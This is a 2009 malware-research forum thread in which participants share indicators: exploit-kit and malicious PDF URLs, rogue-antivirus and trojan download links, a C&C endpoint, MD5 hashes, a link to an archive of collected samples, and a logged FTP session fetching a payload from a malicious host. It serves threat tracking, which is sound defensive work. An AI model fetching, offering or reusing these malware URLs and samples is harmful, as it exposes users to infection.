will attempt digging them tomorrow though,need some sleep now ;-)
Quote
hxxp://goshak.biz/my/index.php


changed my ip between trys

anyway its not that it recognize my ip or something,it just gives some error saying "file does not begin with %pdf " or something like that

also another one on that IP:

Code: [Select]
http://volimir.biz/my/index.phphttp://wepawet.iseclab.org/view.php?hash=57cae50b99f2591b0612eba32de4a67b&t=1239134249&type=js

the pdf exploit itself is at:(wepawet didnt analyze it)
Code: [Select]
http://volimir.biz/my/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=22ae140b9b2f549caffb7328bb4dbf0c&t=1239134421&type=js
Title: Re: daily something......
Post by: sowhat-x on April 07, 2009, 08:09:55 pm
Oh,the .pdf file itself you meant?I'll check it tomorrow,my mind isn't working properly at the moment,plus i'm not in front of a vm...i need to sleep.
Last one for tonight - exploring the rest of this ip,is..."left as an excercise for the reader"  :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
Quote
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php
Title: Re: daily something......
Post by: CM_MWR on April 07, 2009, 08:24:37 pm
Forget where these dingleberries fell from... ???

174.133.72.250/p0324/2.0/td.bin?bb021908657356
174.133.73.178/p0324/2.0/d.bin?bb021908154292
75.125.239.42/p0324/2.0/so.bin?bb021908350659
dglcxlcfmk.net/bbsuper0.php
dglcxlcfmk.net/bbsuper1.php
dglcxlcfmk.net/bbsuper2.php
dglcxlcfmk.net/bbsuper3.php
dglcxlcfmk.net/uniq.php?id=1693466186&p=0
zief.pl/wr.exe
install.8800.org/files/5.exe
install.8800.org/files/adx.exe
install.8800.org/files/ipk.exe
install.8800.org/files/zha.exe
stanishev.com/1/nfr.exe
stanishev.com/1/pp.06.exe
xz.wanggui.com/mem322.exe
Title: Re: daily something......
Post by: Mr Clean on April 07, 2009, 08:28:08 pm
Oh,the .pdf file itself you meant?I'll check it tomorrow,my mind isn't working properly at the moment,plus i'm not in front of a vm...i need to sleep.
Last one for tonight - exploring the rest of this ip,is..."left as an excercise for the reader"  :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
Quote
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php



nifty!
sets up an ftp and AT jobs to run every 15 minutes, etal

http://wepawet.iseclab.org/view.php?hash=19d22d89420a09c6d59b1d032f19de94&t=1239135714&type=js

Code: [Select]
ftp> open 122.224.9.221
Connected to 122.224.9.221.
220 www.host.com FTP server (Version 6.00LS) ready.
500 AUTH GSSAPI: command not understood.
500 AUTH KERBEROS_V4: command not understood.
KERBEROS_V4 rejected as an authentication type
Name (122.224.9.221:sandbox): qqq
331 Password required for qqq.
Password:
230 User qqq logged in, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get calc.exe
local: calc.exe remote: calc.exe
227 Entering Passive Mode (122,224,9,221,202,67)
150 Opening BINARY mode data connection for 'calc.exe' (245248 bytes).
226 Transfer complete.
245248 bytes received in 2.7 seconds (89 Kbytes/s)
ftp> quit
221 Goodbye.
$ mv calc.exe oddyoy.exe

http://www.malwaredomainlist.com/mdl.php?search=122.224.9&colsearch=All&quantity=50

http://www.virustotal.com/analisis/b80457dd723351fa2a2ff176bcfe8e8b

http://anubis.iseclab.org/?action=result&task_id=141ccbbd213e2be145dd0d57fc0a2d48e

Code: [Select]
http://13-2005-search.com/new1.php

<A HREF=http://xxxhardpornteenxxx.com
><BR><BR><BR><BR><BR><BR><BR><BR><BR><CENTER><FONT SIZE=+6>ENTER</FONT></A>

$ dig 13-2005-search.com +short
220.196.59.1


Busy little network
http://www.malwaredomainlist.com/mdl.php?search=220.196.59&colsearch=All&quantity=50

Title: Re: daily something......
Post by: mercutio on April 08, 2009, 03:38:05 am
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
Code: [Select]
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file
Title: Re: daily something......
Post by: sowhat-x on April 08, 2009, 08:21:32 am
The rest from the same ip mentioned yesterday...pretty easy task:
Quote
hxxp://dihbgbwqryuolfbebgme.cn/s_t.php
hxxp://dcz9ubei212vp3nrca5i.cn/s_t.php
hxxp://znchygdrmelzejjvofji.cn/s_t.php
hxxp://virevpcklvlrxjcqxtij.cn/s_t.php
hxxp://xbfnyukgdoqrjrsfmcdm.cn/s_t.php
hxxp://qjiv7qj4irh2f1o2v8sm.cn/s_t.php
hxxp://1zs0ewvqcget52rl1z1n.cn/s_t.php
hxxp://lufwhtelkadvrtaukqjo.cn/s_t.php
hxxp://ddvrrflabpqcuoaexpwp.cn/s_t.php
hxxp://lmempodfzrqqkteyupar.cn/s_t.php
hxxp://zjjrrhhuokjxgmulisxs.cn/s_t.php
hxxp://tckeblkiumuhysrwqlev.cn/s_t.php
hxxp://egntxselsaossawilurx.cn/s_t.php
hxxp://hsyzpbavkojdqclhnoqz.cn/s_t.php
==================
Quote
hxxp://msvcp70.biz/e514.gif
hxxp://msvcp70.biz/e536.gif
hxxp://msvcp70.biz/e509.gif

Quote
hxxp://msvcp50.biz/e514.gif
hxxp://msvcp50.biz/e536.gif
hxxp://msvcp50.biz/e509.gif

Quote
hxxp://yourguardon.com/
Iframes to goshak.biz listed earlier...
==================
Quote
Code: [Select]

ftp> open 122.224.9.221
Connected to 122.224.9.221.
............

Here's the rest of domains there...  :)
http://www.bfk.de/bfk_dnslogger.html?query=122.224.9.221#result
Quote
hxxp://wllvvkjknh.cn/md/index.php
hxxp://woqyymmptn.cn/md/index.php
hxxp://ozimzikjun.cn/md/index.php
hxxp://zusojbktvo.cn/md/index.php
hxxp://enjnzdfmts.cn/md/index.php
hxxp://fxlbubmkfs.cn/md/index.php
hxxp://pxciiruurw.cn/md/index.php

As for the one not listed above,miss-office-2009.com namely...
seems we've got a pretty hardcore spammer here,so...let's vote for him ;-)
http://www.google.com/search?q=miss-office-2009.com
Title: Re: daily something......
Post by: CkreM on April 08, 2009, 10:53:00 am
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
Code: [Select]
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file


yeaa that what i was talking about,kept getting this error though in the end it did redirect me to the other iframe there at vparivatel.php
Title: Re: daily something......
Post by: SysAdMini on April 08, 2009, 11:30:55 am
exploits/trojan
Code: [Select]
www.besplatnoe-porno.info/downloads/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=937bb224a8eb2fd48d1d812a867c9623&t=1239190412&type=js
http://www.virustotal.com/analisis/99a1a9d2003b23212842cd22ee90c129 3/40
Title: Re: daily something......
Post by: SysAdMini on April 08, 2009, 11:39:35 am
exploits
Code: [Select]
m.winxyz.comhttp://wepawet.iseclab.org/view.php?hash=d66445fca10663d693af2f98cd2d398c&t=1239171377&type=js

Code: [Select]
http://winxyz.com/win/j.exehttp://www.virustotal.com/analisis/ce445dadf7062fd70787035dbca77edf 13/40

Code: [Select]
http://winzxm.com/win/u.exehttp://www.virustotal.com/analisis/e06dfabe4a1a7fabf065604678b24b9c 11/39
Title: Re: daily something......
Post by: sowhat-x on April 09, 2009, 01:19:05 am
TDSS variant:
http://www.virustotal.com/analisis/f24fe6a2671b58376efafef6b068254c
Quote
hxxp://traffbox.com/in.cgi?6
hxxp://goscandata.com/?uid=12404
hxxp://scan7live.com/?uid=12404
hxxp://scan7live.com/download/install.php

Koobface variant:
http://www.virustotal.com/analisis/0d66a352aa6c6f7579fae43a1aba4c15
Quote
hxxp://traffbox.com/in.cgi?3
hxxp://hqviewworldmy1.com/view/1/1222/1/2
hxxp://hqviewworldmy1.com/download/1/1222/1/2
hxxp://hqviewworldmy1.com/software/c2fb59fa16/12221/1/2.exe

Notice that traffbox.com above redirects either to tdss or koobface,depending on parameters passed...

Now,same type Koobface variant as above,different hash though:
http://www.virustotal.com/analisis/2104a7d2b8c8a3fd2f84128d90c84fe9
Quote
hxxp://hqviewworldmy1.com/software/c2fb59fa16/10005/1/Setup.exe
========================
Quote
hxxp://welovesandi.com/?cmpid=
hxxp://crustat.com/ts/in.cgi?gen&se=oth&ur=1&hxxp_REFERER=wel-cmpid%3D
hxxp://www.scanspywareonline.com/online-scan.html?ewmid=231&pwebmid=gen&rejurl=hxxp://pnfzetnax.net/asw/gen/
hxxp://pnfzetnax.net/asw/gen/
hxxp://truconv.com/?a=125&s=gen-asw
hxxp://top-name.cn/in.cgi?default&a=ks125&s=gen-asw
hxxp://total-virusprotection.com/xpprot/7/?a=ks125&s=gen-asw&z=
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe
--->
Quote
hxxp://setup.total-virusprotection.com/ -> Open dir... ;-)
--->
The executables there... (md5 dupes not listed)
Quote
hxxp://setup.total-virusprotection.com/total-malwareprotection.com/1.0.11.0/updatexpvps.exe
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe.1
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe

Play around with crustat.com's parameters above,it generates numerous nifty links...
========================
Plus another open dir with fake AVs...have fun:
Quote
hxxp://download.pcantimalwaresolution.com/

Quote
hxxp://offer-provider.com/srm/adv/142/
hxxp://dwnld.offer-provider.com/secure/940907dc34c7bed5e75f1e517b2b3a42/49dd612d/srm/srm_free_setup.exe

Quote
hxxp://infracleaner.in/download.php?affid=02935

Quote
hxxp://onlinebrandsecurity.com/download.php?affid=17503
Title: Re: daily something......
Post by: sowhat-x on April 09, 2009, 12:36:07 pm
Direct link to the executable in dwnld.offer-provider.com above,seems to have changed since yesterday...
Quote
hxxp://dwnld.offer-provider.com/secure/85f2be819efd8db13b4fab89c8a1d2db/49dde7f1/srm/srm_free_setup.exe

Plus,it's open dir,for the time being...
Quote
hxxp://dwnld.offer-provider.com/

36 unique .exes there - here are the md5 checksums...
Code: [Select]
0651b7a4652b62c9bb74493c7440063d
2a5e21896b3043558a44f578a3b4cfea
2f590df32718d03c1c2a8fbeec715cac
2f7a9243cf4179157e382c39b1b8d1ef
31111c18393fcc7a08f7992aedc750ec
3228f756e74b05325beec3c6beeb2dea
3345b80c425dc6affe139ace94fee877
347271c8d9dc43d19b6c96708da08546
4795a9ae8a745c954f7a49944b8383a8
5a9087a4ef2dbf7f9e5a98226e94d8ff
5fb2e122b013aaf49f53502fd137e868
6737ff1d0c98962b515875283458095d
6890de6ce038b5d591aa14533a55292e
75b367bd2754b7dabfe2d1fd9bed789f
7a0051905effe054878aff73e4d01625
84f37f3f8f5434b8e6dad753bea717e9
8cfa3151df73debd3cb9b1bde978239c
9523d691f47fb8eb2457d2dbb3baed29
991c4f16c2f6fdb1712fccb573f6bfaa
9a8ecb72c0ca39145e0a6913f029abad
9b584cad38175a050bcd50805b12417e
a40e8cb47af24ef91023d4c078ad77ac
af862463f039fdc8b53e06406de73e67
b1705495d54f8c8f2f283c4886efb081
bb734c355149c3eed3389d309ea13fb1
c3328da0fa70305efeca816d735fca01
c3ef149dcfc5b3ca9da2578921de0007
c4a362df8a92650f6af41de9c733019a
c96bab9c4c7838b5eab3462e34ad8ec1
d7edd052b5363c57777addb72e8ae47c
d889b0e868832fd4ee7ba868656a6827
d9195a978f8cf2ba213471f4d3f484c3
dd18136c665be386bd02476e523df04e
e9cfd70907cf607b6fe7e92557989e20
f0afe3b1d0d4536cede447ea59053071
feed65765e05fcf542ff797147a88f8f

Here they are archived in .7z format ...78mb approximately:
http://www.megaupload.com/?d=Y33LVTZH
Title: Re: daily something......
Post by: CkreM on April 09, 2009, 06:20:17 pm
Rogue:
Code: [Select]
scanner.rapid-antivir-2009.com/35/?advid=1694&ref=0&p=1000000000
soft-traffic.com

Redirect to rogue:
Code: [Select]
rd-point.net/go.php?id=1188
Exploit/trojan:
Code: [Select]
http://projectns.biz/sploits/pdf.php?id=2http://wepawet.iseclab.org/view.php?hash=46aa9abb1ac32cdd3134f0230694fc1b&t=1239188557&type=js

Exploit/trojan:
Code: [Select]
vas4k.cn/pabl/http://wepawet.iseclab.org/view.php?hash=f39bbd62bab727dc7c075547dd3df249&t=1239191102&type=js

trojan:
Code: [Select]
http://secondgate.ru/77/load.php?id=2http://www.virustotal.com/analisis/4c5fd3e65565e2b33c68c855a58de0ca

trojan:
Code: [Select]
http://bankitrade.com/exp/l.php?b=2&s=djdakhttp://www.virustotal.com/analisis/7070fe304677bbda85dfd8a6970ab46f
Title: Re: daily something......
Post by: SysAdMini on April 10, 2009, 01:24:35 pm
pdf/flash exploit
Code: [Select]
x.lousecn.cnhttp://wepawet.cs.ucsb.edu/view.php?hash=bc0b5c2d562ee175849da928de2727b4&t=1239369858&type=js

Code: [Select]
http://x.lousecn.cn/load.php?id=2http://virscan.org/report/b0abe06d8536b4abe35c6beb9079a5b6.html 4/37
Title: Re: daily something......
Post by: SysAdMini on April 10, 2009, 02:43:58 pm
Code: [Select]
msn-gallery.us/f.jpghttp://virscan.org/report/6735f8decd6ffb129052f297220957c3.html 0/37


Title: Re: daily something......
Post by: sowhat-x on April 10, 2009, 03:00:06 pm
C&C server:
Quote
hxxp://moneystyle.com.cn/bmngr/controller.php?action=bot&entity_list=

Quote
hxxp://www.new-mrcash.net/images/x_01.jpg
Seems like a failed attempt at using Thinstall to me,anyway...
http://anubis.iseclab.org/?action=result&task_id=13ee47e6969787c64dd38f52f3e9842ee&format=html
http://www.virustotal.com/analisis/34a6262329fda4fb398c57de90201a7a

Quote
hxxp://www.new-mrcash.net/images/win_04.jpg
http://www.virustotal.com/analisis/b188a358f58d5b8a0074f81fc79a0f25
Title: Re: daily something......
Post by: GmG on April 10, 2009, 04:16:08 pm
Exploit
Code: [Select]
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php
Title: Re: daily something......
Post by: SysAdMini on April 10, 2009, 04:25:03 pm
Exploit
Code: [Select]
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php


all lead to

trojan Hiloti
Code: [Select]
67.215.246.138/a12/aff_12.exe?u=i_7_0&spl=4http://virscan.org/report/e01f5e00ab1a5916117edaf06bdfd4f1.html 4/37
Title: Re: daily something......
Post by: neoark on April 11, 2009, 12:12:46 pm
Found the whole list not sure if some of them are already included or not.

Quote
hxxp://193.138.172.15/salo/?16de305069114a106409128eb3bb985b8d4d98674d1376589cbccfd886874a6072e088f250fa24f1270c05764cfe398e75b8936c7cd308dcfab00d2d5beafff0 DIRECT/193.138.172.15
hxxp://193.138.172.15/salo/?27a2f14df1d2659997c6434cebe6df547dff29131b9812ee9e49a3402a2c9a0cd6fc3e067512f7802e3b072473443089755efbe378162268855fb15dd41ddd1b DIRECT/193.138.172.15
hxxp://193.200.255.19/%7Etimchenko/cms/cache/readme.pdf DIRECT/193.200.255.19
hxxp://194.165.5.20/sp/7.pdf DIRECT/194.165.5.20
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/210.83.85.100
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/213.182.197.229
hxxp://202.73.57.6/tomi/?1643bf49f40997de68d1f717b843a34e44612930cf3f24bc08ef9b738eb345962032326f97041b59e6df8f3d76d59a24c4f6a58f05e382fdab2fd26adc9ff32e DIRECT/202.73.57.6
hxxp://78.129.166.5/%7Exqz/sp/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.93.80 DIRECT/78.129.166.5
hxxp://7ioi.biz/fo/spl/pdf.pdf DIRECT/213.182.197.236
hxxp://94.247.2.122/us.pdf DIRECT/94.247.2.122
hxxp://94.247.2.195/news/?id=2 DIRECT/94.247.2.195
hxxp://96.0.13.1/jms/sploits/test.pdf DIRECT/96.0.13.1
hxxp://alibaster-lab.com/ku4ka/?06f069b34f8391ebb6b30bea77dd544a00c51b31052c162535b1651701bdbc8d795bfdad269883f3bcffd34481d4b002aaf7794493ec9d458a16526e53f4ec55 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?7d175e916943129c063df2755092f4b03b2adbfd3e07325549fca0a004193bfa99ae001fc45d8818ca91c9481393fed02d8b28ebdae25d1f20086790abf0268b DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?9818afdf8dbc7d26f9aabec45e66429d94873736ab28091bbb95c1235df09ff235048abe2ac286d7851421c916604e1e59f310a08ccf84738e202c7f65937144 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?a57de90806f02a6a9ba60c5bac2c4d51ec994e0838e76879965e0c6e13f3c9d53ecd0a3c929c1e690a2265ad262cf425f67d010dae21fceee3b6936e2ad19367 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?a60c2ced642a47a04cd3634efa5b32f6c37a5cb5d6b7d1f5a622043c740820680b775ce5864eda801bfbaf4e9103274485bf9850fd25fab793128ef89b627ff9 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?a6904e4daaa45b62e2fa3ae37946f807ac9d22f59134e91022bae9cc14af2199bbf44dcb587cc57da04cede8328127ac499f78642beab317ff768ade8ee96872 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?aa31ae54c455d5239ce8bb7e052ccede8faec050044695efb05e8996930cf3e12bef660d5aa4e84e3cf9ccd70e801a257bb73f2dc33d10dd91cbbb0dd183a26c DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?b36ae95f732ef6b87311f229bdf95b0285a346a85f964afc81c8f60a5c48a26bb4e4d9b2317ad66fe4553096ff7127ce21ae1e0ec034949ab48a4e7329ead9ae DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?bf18df2f1a8515e59f6c5f41f9bd781cd913576ea4528b5fbc5b44d826febf794b8169fd7255691b7e6049c25f476480bee770e5b4d7a378c08c9228f9331592 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?c6b768850be96601249400e780d182e2144a43bb61f65f21cd570e567ccad8becf5dad7a9263b79962f824df94ca90c7a1e3d7efc00ea82fde510bcbf9a907c2 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?d8a5c5296b9ac376636d2c4c549f59ee6c4d990aba09bc735e122abcc14cc8ca891a5c0a7d44cd5fcaa100f0beac0da93097230c3f47c8e9ef3193e393c9cdd3 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?ecde4e68294d2139b61c47fa902a47fff0a30d57e062e38694ff262a2fe762dee88d5243393bf613dd04d32fb97cd38aa3de05223e7192b83fbbdfa870aa5a68 DIRECT/195.216.175.114
hxxp://bankitrade.com/exp/s/i.pdf DIRECT/95.129.145.242
hxxp://basesrv3.net/bin2/pdf.php DIRECT/91.212.41.90
hxxp://basesrv3.net/bin/pdf.php DIRECT/91.212.41.90
hxxp://basesrv.net/bin/pdf.php DIRECT/91.212.41.90
hxxp://bdsm-movies.info/33/cache/readme.pdf DIRECT/216.195.40.120
hxxp://bestyourown.cn/sploits/pdf.php?id=2 DIRECT/64.86.16.8
hxxp://bigtopescorts.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://blufda.com/c94mee22/pdf.exp.php DIRECT/78.26.179.66
hxxp://blufda.com/rro69s6x/pdf.exp.php DIRECT/78.26.179.66
hxxp://bytenetcom.cn/nuc/spl/pdf.pdf DIRECT/91.203.4.106
hxxp://casinoslotbet.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://checkantiddos.info/f/spl/pdf.pdf DIRECT/213.182.197.229
hxxp://darkslim.cn/1/cache/doc.pdf DIRECT/118.126.4.86
hxxp://dolpassgiven.ru/3/pdf.php DIRECT/91.212.41.209
hxxp://exploitbla.biz/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C83.202.72.17 DIRECT/78.129.166.5
hxxp://famajormusic.ru/jjkj/pdf.php DIRECT/91.212.41.209
hxxp://firstgate.ru/33/cache/readme.pdf DIRECT/216.195.40.117
hxxp://ghrgt.hostindianet.com/cache/readme.pdf DIRECT/94.247.3.151
hxxp://hyperliteautoservices.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://illegaltopcounters.ru/1/pdf.php DIRECT/95.129.144.13
hxxp://ispacemac.ru/1/pdf.php DIRECT/91.212.41.209
hxxp://kovsutap.cn/na/pdf.php DIRECT/91.212.41.102
hxxp://krona98.biz/opi/cache/readme.pdf DIRECT/91.203.4.59
hxxp://letomerin.cn/x0/spl/pdf.pdf DIRECT/213.182.197.235
hxxp://letomerin.cn/x0/spl/pdf.pdf DIRECT/78.109.25.216
hxxp://liteautofinestsite.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://liteautorepair.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://litebest.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://litedownloadfinest.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://litehitscar.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://myfucking-pussy.com/tyrek/?08af957e26feebebaeb788d5cd4e0bce59d419a38c684b6284399e6f4266ecf617b7cbbc629c1ae6dcbc5d1308b8f7a0f4bc729239e9bc619e35869086f85d91 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2200182aeb20dafdb47df1ddb4c819a8c4fbb5aa86c643a6ab01604ed81d4bdc22b4f578326e3fb577f9f18ddef1629c91ee8f8100f8d97b6298ff1ccb758022 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?26b5416cc91f58dc7c02a0fe304439184eb065a196467bf930f38148f19b82399f69437a2fef5aee53c9f38630d78d58dbf9c126b99969cd37644c624b2bf7e9 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2b0ea2e40df93fd74b3090538c69990b533e402b6d40de4e1bd59f11e1c0b5a5539ea0e297dd79c0da7080ab1b9a997adb28b5a5fb1bfda4c9e574f158cae17b DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2c93b5539de28316012cf3c43ae2e0899193b20165672972af0703842b882c4cd653d6678404ec1b9b9e34794de15e047ebc488e31572e5a208bad33b0509eea DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2ef099bd359071ac46865dd01cdbd5fb8119b1a6c7b40e53560e37666231a2adb2faecf9b8751c19afa607c470c6feb11409168ffd87adb4066f0e79b0eb5746 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?45215b094440c6bdbc3a79e93561bca421fa2609fa75023f6083d23c1484dec389155714563636e200f5f3e5f1756b36c791e52c8e9da926310f42bc2e912727 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?4868406547514fc3c03e2c2cf7c3ecabbc6cc12a3b518a186c5837cf5297b9673e5444e84d888159e02754192054464210434a34f3b3c879035fc60745eeb815 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?595774b8b2f4672ba31f4ead701dc4ad4209ecec783cc7183ae504c40187203e7d0e66a1ee4c846d45573cda11fe0cc711a9b87f43a4b427f6f85e91f1eb30e9 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?626a25588a38f82452d5822340b84679b2dffea91b01be8f36a51363dccab07749a2e27780f195671c4e4c15056cf17192b17c4760d0874dbd00efec356c4497 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?7095d071692e927060e60d0bc637cec2be3223e6fe11ee05f10e23cbc4fc5bee921e6cf5579ac960235f7dc64eb81ca7bbd88c635afb8864c6c8f945e4e7d302 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?7482db71fcfa7db49e23e1553c2b433b9f4da51e9b2fe2460a20c43117aa8662ceeb0e844f7451a136dd122114b89a86eac384e28ba1a3fac6547a215327eebc DIRECT/72.233.79.18
hxxp://p0rn-movies.com/77/cache/readme.pdf DIRECT/91.212.41.102
hxxp://paksusic.cn/nuc/spl/pdf.pdf DIRECT/91.212.65.7
hxxp://projectns.biz/sploits/pdf.php?id=2 DIRECT/91.206.226.41
hxxp://qicdator.cn/nuc/spl/pdf.pdf DIRECT/91.212.65.7
hxxp://rifnasax.cn/nuc/spl/pdf.pdf DIRECT/91.212.65.7
hxxp://secondgate.ru/77/cache/readme.pdf DIRECT/216.195.56.149
hxxp://seotraff.biz/cms/cache/readme.pdf DIRECT/193.200.255.19
hxxp://siplank.com/qqp/pdf.php DIRECT/209.44.126.62
hxxp://stats-analytics.cn/lera/?2b4a9572ff7310be2b53663701857cdb29c08df5d86020af263785aa02c9158b1c1fcbc6d92b1199afcc514ab5210c2b67a1f94d844e344d0cac9e3711d3cf64 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?2c77f0edd917158b3213735a7a8b5fc01e689fc9e7982a67ce485344c701c57ff78f4a985f1d65c06361192592d28593bbce8be327029114a997a36624fc120b DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?30d68f7627e7966b6b53f697876d432d80f4297b61f2528b4c5d7d9d3e9fac08113794f5db25cc9e8f0b816016d5ab17035d91547bfdefab078d6b847a079da6 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?3cca334cbb795f89bf718e1b994f133610a4caddf301ea4220113c863f59cca50cdefda9a607cec73cbf691d37b9e15f4ad50c00d39ec521ca6b02cf3dabe305 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?5b18cdb699e3855f2dc0c0b4fcced806470f26ba806317ea1decffd3ac05e7140c556f72cc6ad7a3bbccb04aeab467986801367498c4b2815f4176af31da87af DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?670bb9759520482dc9428639faa3b88e917c31ed3c72be4e6ae6822f187aa14e6b75d689c9a89b5950f6501a98faa5693af640753dcffcdbd84d96e298b03dbc DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?6c4edbbde1079a141f222f317462eae4257d6b70b2bb4cb873bf3fd8bc03ab5d0c41e68c4e66d3ab6a790e97d6c05e9367eec5ee4e5c93e8911352c50f71a5e3 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?924790525309dec3e79471a120b3d4e58874eb7e0b7986865f637467b023b120edb1f0c242159c63b2e685d5c3029c5f6a0e633b9d11191decaf9f05e5129b03 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?c4208aeddcbdc2559b016827733b8b11cffc038505fe08852fca694c7fd06ef0cd56b0a69a69a70a6816ac602182e3f0ebf5a77ab0775bdd9ddef43df7dcd322 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?c771c57144bf5721b1e30df8f9790430abec4c730132c06965d939dd3f431a68717a6336bcf6c44e6fb52ebd63cf275d4022cd59321f6b818900a06c04ac573a DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?cdc72a9e29fa2202c913c84c28672f25413aae316898ed78cfc12f85e970b18e28f6c53f345f1cb5c11b342fc2df80c0c0c1ea15a8d210bade54ad00d0c48061 DIRECT/94.232.248.51
hxxp://time-for-mumpreneurs.site90.net/images/acs.php DIRECT/64.235.47.65
hxxp://tochtonenado.com/yes/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.231.245 DIRECT/95.129.144.228
hxxp://tochtonenado.com/yes/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.80.121 DIRECT/95.129.144.228
hxxp://tusset.de/z/pdf.php?t=4%20&znk@%20l=700 DIRECT/88.84.137.164
hxxp://vestelia.com/qqp/pdf.php DIRECT/209.44.126.62
hxxp://www.murka-best.com/include/spl.php?do=foxit DIRECT/122.224.5.189

All of the above are pdf/java exploits.
Title: Re: daily something......
Post by: SysAdMini on April 11, 2009, 01:59:28 pm
Found the whole list not sure if some of them are already included or not.


Most of those urls have already been at the list.

It looks like Malekal's exploit list.
Title: Re: daily something......
Post by: Malware-Web-Threats on April 11, 2009, 11:32:53 pm
193.111.244.21

Exploit (util.printf) - Wepawet (http://wepawet.iseclab.org/view.php?hash=11d02f5e15a36bdf8ff9a7f8779b5929&t=1239491654&type=js)

Code: [Select]
hxxp://onlinepharmacy4you.org/65/iepdf.php?f=new
Trojan

Code: [Select]
hxxp://onlinepharmacy4you.org/65/load.php
hxxp://www.kandidatov.net/1/p.exe
VirusTotal (http://www.virustotal.com/analisis/037af797be509dc3da1380fdf34df1c5) 35/40 (87.5%)

Anubis (http://anubis.iseclab.org/?action=result&task_id=1b3cce6a0deb513e4fdc83a2990e917ce)
Title: Re: daily something......
Post by: CkreM on April 12, 2009, 05:06:58 am
Zbot
Code: [Select]
finik.us/live/load.php?e=1http://www.virustotal.com/analisis/f081994ac023069ebe47ddd949adc743
Rogue:
Code: [Select]
http://www.chorussoft.com/install.exehttp://www.virustotal.com/analisis/a06a11e5549f88f483d564c2582ccc97

This IP is full of rogue:
http://www.bfk.de/bfk_dnslogger_en.html?query=64.191.12.38#result
the ones that aren't in MDL
Code: [Select]
ms-antispyware2009.com
pro-antispyware2009.com
http://files.load-antivir-pro-pc.com/release/setup.exe
totalantispyware2009.com
totalantispyware.com
system-cleanerpro.com
syscleanerpro.com
totalantispyware.net

other Rogue:

Code: [Select]
http://ugh-softwares.com/promo.exe
http://gdfshgfh.com/promo.exe
http://uniquexporn.com/promo.exe
http://www.virustotal.com/analisis/14a94fb9a291d16fbbade9a078d67846

Code: [Select]
http://bonuspromooffer.com/srm/adv/142/?a=cspsant1p&l=273&f=cs_7175823974&ex=&ed=⊂=&prodabbr=USRM
Title: Re: daily something......
Post by: GmG on April 12, 2009, 04:59:30 pm
exploit

Code: [Select]
http://niggerok.com/fafa/index.php
